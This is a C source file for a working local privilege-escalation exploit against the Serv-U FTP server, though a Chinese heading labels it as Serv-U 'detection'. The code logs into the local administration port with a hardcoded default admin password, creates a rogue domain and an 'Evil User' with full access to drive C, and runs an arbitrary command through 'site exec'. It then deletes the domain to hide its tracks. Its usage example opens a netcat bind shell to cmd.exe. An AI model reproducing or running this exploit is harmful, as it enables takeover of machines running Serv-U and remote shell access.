ser.cpp

serv-u检测

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>


//Responses
#define BANNER                  "220 "
#define USEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID                "200-DomainID="
//Commands


#define XPLUSER                    "USER haxorcitos\r\n"
#define XPLPASSWORD                "PASS whitex0r\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PASS #l@$ak#.lk;0@P\r\n"


#define MAINTENANCE             "SITE MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
                 "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
   "-TZOEnable=0\r\n"
   " TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
                 " DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
                 "-IP=0.0.0.0\r\n"
                 " PortNo=2121\r\n";


char newuser[] =
                "-SETUSERSETUP\r\n"
                "-IP=0.0.0.0\r\n"
                "-PortNo=2121\r\n"
                "-User=haxorcitos\r\n"
                "-Password=whitex0r\r\n"
                "-HomeDir=c:\\\r\n"
                "-LoginMesFile=\r\n"
                "-Disable=0\r\n"
                "-RelPaths=1\r\n"
                "-NeedSecure=0\r\n"
                "-HideHidden=0\r\n"
                "-AlwaysAllowLogin=0\r\n"
                "-ChangePassword=0\r\n"
                "-QuotaEnable=0\r\n"
                "-MaxUsersLoginPerIP=-1\r\n"
                "-SpeedLimitUp=0\r\n"
                "-SpeedLimitDown=0\r\n"
                "-MaxNrUsers=-1\r\n"
                "-IdleTimeOut=600\r\n"
                "-SessionTimeOut=-1\r\n"
                "-Expire=0\r\n"
                "-RatioUp=1\r\n"
                "-RatioDown=1\r\n"
                "-RatiosCredit=0\r\n"
                "-QuotaCurrent=0\r\n"
                "-QuotaMaximum=0\r\n"
                "-Maintenance=None\r\n"
                "-PasswordType=Regular\r\n"
                "-Ratios=None\r\n"
                " Access=c:\\|RELP\r\n";


#define localport 43958
#define localip "127.0.0.1"


char cadena[1024];
int rec,domain;
/******************************************************************************/


void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
 send(sock,data,strlen(data),0);
 if (ShowSend) printf(">%s",data);
 Sleep(100);
 do {
         rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
         if (rec<=0) return;
         if (showResponses) printf("<%s",cadena);
         if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
                domain=atoi(cadena+strlen(DOMAINID));
 //} while (strncmp(cadena,response,strlen(response))!=0);
 } while (strstr(cadena,response)==NULL);
  printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
 WSADATA ws;
        int sock,sock2;


        struct sockaddr_in haxorcitos;
        struct sockaddr_in xpl;


printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
        printf("USAGE:   ServuLocal.exe \"command\"\r\n");
        printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
         return(0);
}


        if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
  printf(" [-] WSAStartup() error\n");
  exit(0);
 }


 haxorcitos.sin_family = AF_INET;
 haxorcitos.sin_port = htons(localport);
 haxorcitos.sin_addr.s_addr = inet_addr(localip);
        sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
        rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
        printf("<%s",cadena);


        ParseCommands(sock,USER,1,1,USEROK);
        ParseCommands(sock,PASSWORD,1,1,PASSOK);
        ParseCommands(sock,MAINTENANCE,1,0,"230 ");


        printf("[+] Creating New Domain...\r\n");
        ParseCommands(sock,newdomain,0,1,BANNER);
        printf("[+] Domain Haxorcitos:%i Created\n",domain);


/* Only for v5.x
        printf("[+] Setting New Domain Online\r\n");
        sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
        ParseCommands(sock,cadena,0,1,BANNER);
*/
        printf("[+] Creating Evil User\r\n");
        ParseCommands(sock,newuser,0,1,"200 ");
        Sleep(1000);


        printf("[+] Now Exploiting...\r\n");
 xpl.sin_family = AF_INET;
 xpl.sin_port = htons(2121);
 xpl.sin_addr.s_addr = inet_addr(localip);
        sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
        rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
        ParseCommands(sock2,XPLUSER,1,1,USEROK);
        ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
        printf("[+] Now Executing: %s\r\n",argv[1]);
        sprintf(cadena,"site exec %s\r\n",argv[1]);
        send(sock2,cadena,strlen(cadena),0);
        shutdown(sock2,SD_BOTH);
        Sleep(100);
        ParseCommands(sock,deldomain,0,1,BANNER);
        send(sock,EXIT,strlen(EXIT),0);
        shutdown(sock,SD_BOTH);
        closesocket(sock);
        closesocket(sock2);


        return 0;
}